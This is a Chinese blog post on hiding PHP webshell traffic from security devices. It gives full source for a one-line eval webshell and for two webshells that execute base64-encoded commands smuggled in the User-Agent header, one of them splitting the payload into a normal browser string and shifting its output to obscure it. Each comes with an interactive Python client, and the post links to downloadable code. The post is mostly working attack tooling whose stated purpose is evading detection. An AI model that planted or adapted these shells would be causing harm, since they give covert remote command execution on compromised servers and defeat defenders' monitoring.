PHPwebshell 流量加密

2020-07-14  本文已影响0人  F1_bd2c

PHPwebshell 流量加密分析

目前市场上的安全设备对于恶意数据流都可精准检测其特征,而常规的一句话木马、菜刀等特征过于明显。而且大部分的黑客工具都被列入特征库,所以攻击方的攻击手法很容易被针对,攻击链路也很容易被还原。

php一句话

<?php eval(@$_POST['a']); ?>常规的一句话木马传输参数均为明文传输,很容被针对检测。

一句话webshell访问 一句话webshell流量

简单加密

常规的webshell是将所需的payload通过post进行传参,很容易被流量设备检测。如下,可以通过user_agent base64加密进行传参执行命令。

Webshell原代码:

```

<?php

$dd = $_SERVER['HTTP_USER_AGENT’];

//获取user_agent参数

$qq = base64_decode($dd);

//解密user_agent参数

$jjj = exec ($qq,$out);

//执行user_agent参数

for ($i=0 ;$i < count($out) ;$i++){

$ls = $ls.$out[$i]."\n";

}

echo base64_encode($ls);

//加密输入执行后的系统命令

?>

```

user_agent传参 数据流量图

顺手配上一个简单python客户端

客户端源代码:

#!/usr/bin/python

# -*- coding: UTF-8 -*-

import requests

import base64

str_1 = ""

headers = {

"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",

"User-Agent": "adwd",

"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",

"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",

"Accept-Encoding":"gzip, deflate"

}

while True:

str_1 = input("please input cmd:")

str_1 = bytes(str_1, encoding="gbk")

str_1 = base64.b64encode(str_1)

headers['User-Agent']=str_1

ls = requests.get(url="http://127.0.0.1/1.php",headers=headers)#url更改位置

ls_1 = ls.content

ls_1 = base64.b64decode(ls_1)

ls_2 = str (ls_1, encoding="gbk")

print (ls_2)

客户端使用

混淆加密

思路:客户端将所需的payload进行拆分,嵌入正常的user_agent中,然后传入服务器。Webshell再从user_agent中提取payload执行,将回显命令通过base64+assic移位进行加密。

Webshell源码:

<?php

$dd = $_SERVER['HTTP_USER_AGENT'];

$dd = str_replace("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_ Version/5.1 Safari/534.50", "", $dd);

$dd = str_replace("6_8; en-us) AppleWebKit/53", "", $dd);

$dd = str_replace("4.50 (KHTML, like Gecko)", "", $dd);#提取payload

$qq = base64_decode($dd);

$jjj = exec ($qq,$out);

for ($i=0 ;$i < count($out) ;$i++){

$ls = $ls.$out[$i]."\n";

}

function xxx($string_1)

{

#echo strlen($string_1);

for ($j=0 ;$j < strlen($string_1) ;$j++){

$string_1[$j] = chr(ord($string_1[$j])+1);

$ls_1 = $ls_1.$string_1[$j];

}

return $ls_1;

}

$ls = base64_encode($ls);#base64加密

$ls = xxx($ls);#assic移位

echo $ls;

?>

客户端源代码:

#!/usr/bin/python

# -*- coding: UTF-8 -*-

import requests

import base64

str_1 = ""

str_2 = ""

def divide(str3):#拆分payload

num = int(len(str3)/2)

num_1 = int(len(str3))

str1 = str3[0:num]

str2 = str3[num:num_1]

return (str1,str2)

headers = {

"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",

"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",

"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",

"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",

"Accept-Encoding": "gzip, deflate"

}

user_agent_1 = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_ Version/5.1 Safari/534.50"

user_agent_2 = "6_8; en-us) AppleWebKit/53"

user_agent_3 = "4.50 (KHTML, like Gecko)"

headers['User-Agent']=user_agent_1+str_1+user_agent_2+str_2+user_agent_3#拼接user_agent

def xxx(string_1):#assic移位解密

xxx_ls = ""

for i in string_1:

xxx_ls = xxx_ls + chr(ord(i)-1)

return (xxx_ls)

print("example:http://127.0.0.1/1.php")

url = input("请输入:")

while True:

str_3 = input("please input cmd:")

str_3 = bytes(str_3, encoding="gbk")

str_3 = base64.b64encode(str_3)

str_1, str_2 = divide(str_3)

str_1 = str(str_1, encoding="gbk")

str_2 = str(str_2, encoding="gbk")

headers['User-Agent']=user_agent_1+str_1+user_agent_2+str_2+user_agent_3

ls = requests.get(url=url,headers=headers)

ls_1 = str(ls.content,encoding="gbk")

ls_1 = xxx(ls_1)

ls_1 = bytes(ls_1, encoding="gbk")

ls_1 = base64.b64decode(ls_1)

ls_2 = str (ls_1, encoding="gbk")

print (ls_2)

客户端 数据包

源码下载地址:

https://github.com/1109450752/php_shell/blob/master/php%E6%B7%B7%E6%B7%86%E5%8A%A0%E5%AF%86webshell.zip

                                                                                                                                                      2020-7-14

                                                                                                                                                            YLL

上一篇下一篇

猜你喜欢

热点阅读